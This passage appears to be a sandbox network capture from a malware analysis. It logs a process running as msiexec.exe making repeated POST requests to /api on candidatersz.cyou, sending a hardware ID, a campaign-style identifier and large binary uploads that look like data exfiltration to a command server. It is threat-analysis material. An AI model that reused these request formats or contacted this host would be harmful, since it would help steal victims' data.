2024-11-22 15:35:39 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-22 15:35:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	104.21.56.6	443	2208	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 15:35:41 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 50 Host: candidatersz.cyou
2024-11-22 15:35:41 UTC	50	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 31 30 76 73 30 36 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=MeHdy4--pl10vs06&j=
2024-11-22 15:35:42 UTC	1017	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 15:35:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t8klpahfbmu74ueg571o8b7ks4; expires=Tue, 18-Mar-2025 09:22:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uQ8sS2HCn2GzzneqrXCt7zlFlDMdKHiXcxfdKp15WAO0iBkafqxZC2Za7T5DLqGL0Xv%2BE%2BRhsKk%2FeCi36xT%2BmJqbZT8SuOxIVrVG2W99uwvyv2gId8DfeIlNcl2eCh0JRfNW3w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e69fda53bbd0cbe-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1701&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=951&delivery_rate=1625835&cwnd=193&unsent_bytes=0&cid=6412f855d5e23569&ts=723&x=0"
2024-11-22 15:35:42 UTC	352	IN	Data Raw: 34 34 36 63 0d 0a 6b 68 56 52 74 6d 6a 58 2f 6a 4f 77 39 77 59 6f 53 77 46 77 2f 78 41 37 61 7a 73 6a 42 74 76 6b 32 63 73 68 57 51 78 39 33 51 76 70 4e 79 65 55 55 75 50 53 45 63 4f 53 4a 42 49 2f 63 77 57 61 50 42 6b 4b 58 77 45 38 76 59 57 31 75 45 52 31 4c 67 75 77 4b 61 68 7a 4d 4e 6f 62 73 74 49 52 31 59 38 6b 45 68 42 36 55 70 70 2b 47 56 45 5a 52 6d 79 35 68 62 57 70 51 44 4a 6a 44 62 46 6f 2b 6e 6b 32 33 67 32 30 6d 6c 4c 63 6d 6d 4e 4e 4c 6d 41 61 6b 58 6c 57 41 31 59 42 4b 76 6d 42 6f 2b 6b 62 65 30 45 59 71 57 72 66 64 43 4c 64 53 71 72 53 53 4a 4b 53 61 41 70 78 49 78 47 61 63 6c 63 4e 58 30 68 75 73 34 79 39 71 45 55 7a 66 42 53 37 59 2f 70 33 4e 64 38 48 76 59 35 66 31 70 31 6f 53 79 52 67 55 74 4d 79 58 68 45 5a 47 53 54 71 74 4c 69 34 55 Data Ascii: 446ckhVRtmjX/jOw9wYoSwFw/xA7azsjBtvk2cshWQx93QvpNyeUUuPSEcOSJBI/cwWaPBkKXwE8vYW1uER1LguwKahzMNobstIR1Y8kEhB6Upp+GVEZRmy5hbWpQDJjDbFo+nk23g20mlLcmmNNLmAakXlWA1YBKvmBo+kbe0EYqWrfdCLdSqrSSJKSaApxIxGaclcNX0hus4y9qEUzfBS7Y/p3Nd8HvY5f1p1oSyRgUtMyXhEZGSTqtLi4U
2024-11-22 15:35:42 UTC	1369	IN	Data Raw: 6f 4c 75 4a 78 44 32 70 35 76 54 7a 74 6f 47 35 42 2f 57 51 52 54 54 6d 65 35 67 62 47 6a 54 44 46 71 45 72 4a 76 38 48 64 7a 6d 6b 71 79 68 42 47 4b 31 55 64 50 4f 57 51 65 69 7a 42 6a 53 55 59 50 66 66 6d 42 74 2b 6b 62 65 32 59 61 76 47 72 37 65 44 44 63 41 61 65 63 51 39 53 59 59 56 67 76 5a 68 79 58 63 55 73 44 56 30 64 6e 73 49 32 79 72 45 51 2f 4c 6c 48 2f 62 75 67 33 61 35 51 72 75 4a 64 64 32 49 4a 6b 43 6a 59 74 43 39 31 31 56 55 6b 42 41 57 43 34 67 72 71 74 54 54 56 71 45 37 6c 6e 2f 58 67 31 33 67 71 79 6c 6c 6e 61 6c 47 6c 42 4a 6d 4d 58 6b 48 5a 66 42 56 68 45 4a 50 66 47 76 4c 45 44 59 79 34 78 75 47 72 69 4e 51 62 58 42 4c 75 62 52 35 4b 4b 4b 6c 4e 70 5a 42 37 64 4b 68 6b 48 58 45 35 32 75 4a 53 2b 70 31 45 33 61 78 6d 79 61 76 35 33 4e Data Ascii: oLuJxD2p5vTztoG5B/WQRTTme5gbGjTDFqErJv8HdzmkqyhBGK1UdPOWQeizBjSUYPffmBt+kbe2YavGr7eDDcAaecQ9SYYVgvZhyXcUsDV0dnsI2yrEQ/LlH/bug3a5QruJdd2IJkCjYtC911VUkBAWC4grqtTTVqE7ln/Xg13gqyllnalGlBJmMXkHZfBVhEJPfGvLEDYy4xuGriNQbXBLubR5KKKlNpZB7dKhkHXE52uJS+p1E3axmyav53N
2024-11-22 15:35:42 UTC	1369	IN	Data Raw: 62 52 35 4b 4b 4b 6c 4e 70 5a 42 37 64 4b 68 6b 46 55 45 46 76 73 34 4b 37 72 6b 34 2b 62 52 69 38 5a 50 64 39 50 64 4d 4f 75 5a 56 63 31 4a 56 6a 54 69 78 78 46 35 52 2b 56 55 6b 58 41 57 4f 68 78 75 50 70 62 44 78 34 48 4a 42 71 34 58 35 7a 79 30 53 73 33 46 62 65 31 54 77 4b 4c 6d 59 61 6c 6e 52 52 43 55 74 45 61 72 4b 48 73 61 39 43 4e 6d 49 5a 76 32 6a 77 63 54 2f 55 44 62 4b 4f 51 39 65 54 64 6b 42 70 4c 56 4b 61 61 68 6c 52 47 58 64 30 72 70 65 74 36 33 59 34 59 42 47 34 66 37 42 6f 66 63 31 4b 73 70 41 52 69 74 56 76 53 69 56 6b 47 70 74 32 55 51 5a 57 53 48 61 34 69 72 57 37 52 44 74 6e 45 62 42 6c 2b 58 6f 30 32 51 47 2f 6b 56 58 56 6c 43 51 45 61 57 51 4b 33 53 6f 5a 50 30 6c 4d 61 4a 65 4e 74 36 41 44 4a 43 41 47 2f 32 37 38 4e 32 75 55 44 72 Data Ascii: bR5KKKlNpZB7dKhkFUEFvs4K7rk4+bRi8ZPd9PdMOuZVc1JVjTixxF5R+VUkXAWOhxuPpbDx4HJBq4X5zy0Ss3Fbe1TwKLmYalnRRCUtEarKHsa9CNmIZv2jwcT/UDbKOQ9eTdkBpLVKaahlRGXd0rpet63Y4YBG4f7Bofc1KspARitVvSiVkGpt2UQZWSHa4irW7RDtnEbBl+Xo02QG/kVXVlCQEaWQK3SoZP0lMaJeNt6ADJCAG/278N2uUDr
2024-11-22 15:35:42 UTC	1369	IN	Data Raw: 6b 57 46 50 4c 57 51 57 6d 33 30 5a 52 78 6c 47 66 50 6e 65 2b 34 5a 6b 44 69 77 2b 68 53 6e 76 4f 53 71 55 44 62 6e 63 43 5a 4b 5a 5a 30 59 68 62 42 53 55 66 6c 4d 41 55 6b 31 76 76 59 71 79 72 45 55 36 61 78 71 2b 62 66 78 39 4e 64 63 4a 75 70 4e 65 32 74 55 71 43 69 35 37 55 73 55 79 66 42 35 53 54 32 4c 35 6d 66 57 77 41 7a 78 69 58 2b 63 70 2f 48 34 31 30 67 2b 35 6e 56 66 61 6b 47 78 4f 4b 47 55 55 6e 6e 31 64 44 46 68 4f 59 4c 57 49 73 61 68 43 4e 32 55 51 74 47 79 77 4f 58 50 54 45 76 58 45 45 65 4f 57 63 6c 30 35 62 31 4b 43 50 45 42 4a 58 6b 30 6b 34 63 61 36 75 30 6b 78 59 42 71 77 62 50 4e 34 4e 4e 6b 4d 75 5a 5a 59 32 70 4e 72 51 7a 74 67 48 70 4e 31 56 77 56 58 54 47 36 36 69 2f 76 6e 41 7a 78 32 58 2b 63 70 33 48 41 2b 2b 67 47 35 6d 78 48 Data Ascii: kWFPLWQWm30ZRxlGfPne+4ZkDiw+hSnvOSqUDbncCZKZZ0YhbBSUflMAUk1vvYqyrEU6axq+bfx9NdcJupNe2tUqCi57UsUyfB5ST2L5mfWwAzxiX+cp/H410g+5nVfakGxOKGUUnn1dDFhOYLWIsahCN2UQtGywOXPTEvXEEeOWcl05b1KCPEBJXk0k4ca6u0kxYBqwbPN4NNkMuZZY2pNrQztgHpN1VwVXTG66i/vnAzx2X+cp3HA++gG5mxH
2024-11-22 15:35:42 UTC	1369	IN	Data Raw: 6d 63 6a 46 59 55 79 41 55 6c 76 52 6e 53 70 68 66 6d 59 56 54 68 34 46 4c 4a 6c 73 47 68 39 7a 55 71 79 6b 42 47 4b 31 57 4a 46 49 47 41 64 6e 48 74 56 42 46 78 49 59 62 69 41 76 36 4e 4a 4f 32 67 5a 76 6d 7a 36 64 44 4c 65 41 37 4b 55 56 74 47 48 4a 41 52 70 5a 41 72 64 4b 68 6b 67 58 6c 4e 71 71 63 61 6b 35 31 70 37 61 52 50 2f 4d 62 42 7a 4f 64 73 4f 73 70 42 58 31 35 4e 70 53 79 5a 69 45 70 4a 32 55 67 42 66 51 47 6d 38 69 37 2b 37 53 54 42 68 45 37 5a 6c 2f 54 64 39 6c 41 32 74 33 41 6d 53 70 47 6c 45 4a 32 51 45 33 57 30 58 45 42 6c 47 61 50 6e 65 2b 36 68 50 4e 47 30 51 76 47 72 78 66 53 48 47 42 72 79 55 56 4e 36 65 61 6b 77 37 5a 52 32 55 63 56 6f 41 58 6b 6c 6f 73 34 57 38 36 51 31 37 61 51 66 2f 4d 62 42 55 4a 4d 51 48 39 59 4d 66 79 39 56 6a Data Ascii: mcjFYUyAUlvRnSphfmYVTh4FLJlsGh9zUqykBGK1WJFIGAdnHtVBFxIYbiAv6NJO2gZvmz6dDLeA7KUVtGHJARpZArdKhkgXlNqqcak51p7aRP/MbBzOdsOspBX15NpSyZiEpJ2UgBfQGm8i7+7STBhE7Zl/Td9lA2t3AmSpGlEJ2QE3W0XEBlGaPne+6hPNG0QvGrxfSHGBryUVN6eakw7ZR2UcVoAXklos4W86Q17aQf/MbBUJMQH9YMfy9Vj
2024-11-22 15:35:42 UTC	1369	IN	Data Raw: 53 54 59 46 77 50 56 6b 35 74 73 49 4b 7a 71 6b 4d 2f 61 68 69 36 61 76 78 38 4e 4e 63 46 73 5a 56 66 32 35 6f 6b 42 47 6c 6b 43 74 30 71 47 53 68 43 51 6d 69 30 78 71 54 6e 57 6e 74 70 45 2f 38 78 73 48 73 39 30 51 71 2f 6d 6c 58 58 6b 32 35 50 4b 57 67 52 6b 6e 5a 66 44 56 5a 42 62 37 43 48 76 61 78 4a 4d 47 67 53 76 47 2f 32 4e 33 32 55 44 61 33 63 43 5a 4b 31 66 30 63 6c 5a 46 4b 43 50 45 42 4a 58 6b 30 6b 34 63 61 77 70 55 63 38 62 68 4b 38 59 66 56 7a 4f 64 45 4b 76 59 35 5a 30 70 4a 32 57 43 6c 71 46 35 46 78 57 51 31 66 53 47 4b 36 67 76 76 6e 41 7a 78 32 58 2b 63 70 33 58 73 30 2f 51 32 75 33 45 36 63 6a 43 52 4e 4a 53 4e 4b 33 58 4e 53 41 31 5a 4d 5a 37 2b 46 73 4b 78 4a 4f 6d 6b 58 73 6e 76 7a 65 44 7a 51 43 72 71 61 56 39 4f 61 59 6b 30 67 59 Data Ascii: STYFwPVk5tsIKzqkM/ahi6avx8NNcFsZVf25okBGlkCt0qGShCQmi0xqTnWntpE/8xsHs90Qq/mlXXk25PKWgRknZfDVZBb7CHvaxJMGgSvG/2N32UDa3cCZK1f0clZFKCPEBJXk0k4cawpUc8bhK8YfVzOdEKvY5Z0pJ2WClqF5FxWQ1fSGK6gvvnAzx2X+cp3Xs0/Q2u3E6cjCRNJSNK3XNSA1ZMZ7+FsKxJOmkXsnvzeDzQCrqaV9OaYk0gY
2024-11-22 15:35:42 UTC	1369	IN	Data Raw: 65 4e 32 64 6d 63 72 4f 42 71 36 35 55 4e 43 35 52 2f 32 61 77 4c 77 71 55 41 37 4b 48 51 4d 53 59 64 45 31 70 58 46 7a 64 61 68 6c 52 47 58 52 6e 74 34 69 38 76 31 4a 32 53 51 6d 31 62 75 42 77 4a 4e 74 4b 2b 39 78 58 6b 73 30 33 42 47 6c 6e 41 39 30 71 43 56 73 43 46 44 66 75 31 75 6d 32 44 53 49 75 43 66 38 78 6f 6a 6c 7a 78 6b 72 74 33 42 62 52 68 33 5a 4d 4b 6e 55 52 32 6b 78 6e 4c 6b 4e 4d 59 71 36 58 68 5a 64 45 49 57 4d 5a 71 48 69 38 59 6a 44 61 42 4c 4b 4b 45 5a 7a 56 61 77 70 78 57 6c 4c 56 4d 6d 5a 48 47 56 6b 6b 34 63 61 4f 71 6b 30 31 61 51 6d 75 4a 4e 64 74 50 74 49 64 70 4e 77 66 6b 70 4d 6b 45 6e 6b 74 55 70 6c 6a 47 56 45 4a 45 7a 2f 73 31 65 7a 35 45 53 51 67 42 76 39 2f 73 43 39 68 6d 6b 71 6e 33 41 6d 53 30 6d 64 59 4f 32 55 52 69 33 Data Ascii: eN2dmcrOBq65UNC5R/2awLwqUA7KHQMSYdE1pXFzdahlRGXRnt4i8v1J2SQm1buBwJNtK+9xXks03BGlnA90qCVsCFDfu1um2DSIuCf8xojlzxkrt3BbRh3ZMKnUR2kxnLkNMYq6XhZdEIWMZqHi8YjDaBLKKEZzVawpxWlLVMmZHGVkk4caOqk01aQmuJNdtPtIdpNwfkpMkEnktUpljGVEJEz/s1ez5ESQgBv9/sC9hmkqn3AmS0mdYO2URi3
2024-11-22 15:35:42 UTC	1369	IN	Data Raw: 41 54 7a 35 73 37 69 6e 54 54 78 34 44 76 4a 4f 2f 6e 41 79 77 68 71 69 6b 78 47 63 31 57 49 4b 63 54 46 63 33 58 5a 49 53 51 45 52 4e 75 4c 54 36 50 34 54 61 58 46 52 70 69 6e 6d 4e 32 75 47 52 50 57 4f 45 59 72 56 49 30 6b 37 63 52 53 65 5a 46 70 4f 5a 33 39 44 74 34 47 36 76 31 4d 73 59 56 43 52 58 39 46 4a 44 63 45 4a 75 35 4a 57 78 49 51 6b 42 47 6c 73 55 73 56 4c 47 55 45 5a 66 69 72 35 6e 76 76 78 41 77 35 74 45 62 46 75 35 6d 5a 2b 38 77 53 79 6e 55 66 43 67 6d 73 46 42 31 55 7a 33 54 77 5a 44 78 6b 5a 4e 76 66 47 76 37 67 44 59 7a 35 4e 35 44 79 6a 49 47 4f 47 46 66 75 46 45 63 54 56 50 42 68 6e 49 77 44 64 4b 68 6c 4f 57 6c 4e 32 76 34 57 74 71 67 51 46 55 44 69 78 62 76 46 68 49 39 6b 47 6c 4a 39 41 32 4b 74 61 58 79 70 74 48 4a 70 6b 53 45 6b Data Ascii: ATz5s7inTTx4DvJO/nAywhqikxGc1WIKcTFc3XZISQERNuLT6P4TaXFRpinmN2uGRPWOEYrVI0k7cRSeZFpOZ39Dt4G6v1MsYVCRX9FJDcEJu5JWxIQkBGlsUsVLGUEZfir5nvvxAw5tEbFu5mZ+8wSynUfCgmsFB1Uz3TwZDxkZNvfGv7gDYz5N5DyjIGOGFfuFEcTVPBhnIwDdKhlOWlN2v4WtqgQFUDixbvFhI9kGlJ9A2KtaXyptHJpkSEk
2024-11-22 15:35:42 UTC	1369	IN	Data Raw: 49 75 2f 76 31 59 34 66 68 69 42 56 39 31 6c 4e 4d 51 4a 39 37 42 57 33 35 6c 61 64 42 35 79 46 59 30 77 66 77 70 50 51 69 54 33 78 71 50 70 47 33 74 44 44 62 68 35 38 7a 55 66 30 77 65 35 33 45 36 63 6a 43 52 63 61 54 74 42 30 7a 4a 4c 53 51 45 42 49 37 71 55 71 61 39 41 4c 57 31 59 67 56 66 64 5a 54 54 45 43 66 65 74 58 4e 61 44 63 55 6b 35 5a 43 79 6a 58 30 73 4f 53 55 49 6d 6e 4c 7a 35 6d 46 55 34 62 68 47 34 4b 62 34 33 4b 35 52 53 39 62 46 44 31 59 56 6e 43 41 78 5a 55 4b 78 6b 57 67 6c 58 52 69 53 6d 79 4b 4c 70 56 58 73 32 54 50 45 70 34 6a 64 72 6c 45 32 37 6b 56 44 52 6d 32 64 59 4f 32 55 52 69 33 45 65 4e 32 64 75 62 37 69 57 74 72 68 4f 50 33 67 68 67 55 37 32 63 6a 54 71 4e 49 4b 4e 56 73 4c 58 51 6b 6b 2f 59 46 4c 54 4d 6b 46 4a 41 51 46 44 Data Ascii: Iu/v1Y4fhiBV91lNMQJ97BW35ladB5yFY0wfwpPQiT3xqPpG3tDDbh58zUf0we53E6cjCRcaTtB0zJLSQEBI7qUqa9ALW1YgVfdZTTECfetXNaDcUk5ZCyjX0sOSUImnLz5mFU4bhG4Kb43K5RS9bFD1YVnCAxZUKxkWglXRiSmyKLpVXs2TPEp4jdrlE27kVDRm2dYO2URi3EeN2dub7iWtrhOP3ghgU72cjTqNIKNVsLXQkk/YFLTMkFJAQFD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	104.21.56.6	443	2208	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 15:35:43 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FVIUGD64 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18106 Host: candidatersz.cyou
2024-11-22 15:35:43 UTC	15331	OUT	Data Raw: 2d 2d 46 56 49 55 47 44 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 43 31 34 44 44 37 44 43 43 44 44 45 46 43 37 38 33 43 31 42 39 35 41 30 36 38 32 44 35 34 0d 0a 2d 2d 46 56 49 55 47 44 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 56 49 55 47 44 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 30 76 73 30 36 0d 0a 2d 2d 46 56 49 55 47 44 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f Data Ascii: --FVIUGD64Content-Disposition: form-data; name="hwid"DCC14DD7DCCDDEFC783C1B95A0682D54--FVIUGD64Content-Disposition: form-data; name="pid"2--FVIUGD64Content-Disposition: form-data; name="lid"MeHdy4--pl10vs06--FVIUGD64Content-Dispo
2024-11-22 15:35:43 UTC	2775	OUT	Data Raw: d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16 4d 6d b7 df b2 9f ab 08 69 99 b1 aa c5 3d ae 79 aa d5 a8 00 8f 1d 07 3c 68 bb 84 bf 22 32 72 5f 3f ee a9 5d 0a 54 39 63 ee d9 Data Ascii: D\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R?lMmi=y<h"2r_?]T9c
2024-11-22 15:35:44 UTC	1021	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 15:35:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1fd32jk95oq7n9a8673a1htcsn; expires=Tue, 18-Mar-2025 09:22:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WklhIuRNu6NR4a3yohIfyetscy6%2Ba%2BPvwW9hFilcjLH%2FP6lJD6giHByRtBdnghrKOb9R2a0Ovd828toFFTY5Mg%2BtQTm4KhXvWeLvjsuOUTL6%2Fr4C9DPU7dQN1Lpc7MVgVsHinQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e69fdb3de87424a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1972&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19059&delivery_rate=812013&cwnd=252&unsent_bytes=0&cid=9e930a3f4c93b3b5&ts=904&x=0"
2024-11-22 15:35:44 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-22 15:35:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	104.21.56.6	443	2208	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 15:35:46 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=27D1HLP95NPHG5NR3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8781 Host: candidatersz.cyou
2024-11-22 15:35:46 UTC	8781	OUT	Data Raw: 2d 2d 32 37 44 31 48 4c 50 39 35 4e 50 48 47 35 4e 52 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 43 31 34 44 44 37 44 43 43 44 44 45 46 43 37 38 33 43 31 42 39 35 41 30 36 38 32 44 35 34 0d 0a 2d 2d 32 37 44 31 48 4c 50 39 35 4e 50 48 47 35 4e 52 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 37 44 31 48 4c 50 39 35 4e 50 48 47 35 4e 52 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 30 76 73 30 36 Data Ascii: --27D1HLP95NPHG5NR3Content-Disposition: form-data; name="hwid"DCC14DD7DCCDDEFC783C1B95A0682D54--27D1HLP95NPHG5NR3Content-Disposition: form-data; name="pid"2--27D1HLP95NPHG5NR3Content-Disposition: form-data; name="lid"MeHdy4--pl10vs06
2024-11-22 15:35:47 UTC	1017	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 15:35:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=eqcefvs6danrr7mgih8g4d587u; expires=Tue, 18-Mar-2025 09:22:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=crv8IbQFwp5VhEVNwzq1%2Bfe1exx10GqTZykfXlNWavlRLtBHLG8dVpb0WtZooyzNdHGSTIr5IRzZlS%2Fv619xLCOQAc4LHQuvFgDeUXk6gUF8dUijQF9eiEnYosY%2BULzEBnYyFw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e69fdc53f0b4210-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1803&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2843&recv_bytes=9720&delivery_rate=1453459&cwnd=243&unsent_bytes=0&cid=de9b0b138d54230c&ts=755&x=0"
2024-11-22 15:35:47 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-22 15:35:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	104.21.56.6	443	2208	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 15:35:48 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=74V9R9UF91W9A8P74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20434 Host: candidatersz.cyou
2024-11-22 15:35:48 UTC	15331	OUT	Data Raw: 2d 2d 37 34 56 39 52 39 55 46 39 31 57 39 41 38 50 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 43 31 34 44 44 37 44 43 43 44 44 45 46 43 37 38 33 43 31 42 39 35 41 30 36 38 32 44 35 34 0d 0a 2d 2d 37 34 56 39 52 39 55 46 39 31 57 39 41 38 50 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 37 34 56 39 52 39 55 46 39 31 57 39 41 38 50 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 30 76 73 30 36 Data Ascii: --74V9R9UF91W9A8P74Content-Disposition: form-data; name="hwid"DCC14DD7DCCDDEFC783C1B95A0682D54--74V9R9UF91W9A8P74Content-Disposition: form-data; name="pid"3--74V9R9UF91W9A8P74Content-Disposition: form-data; name="lid"MeHdy4--pl10vs06
2024-11-22 15:35:48 UTC	5103	OUT	Data Raw: 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 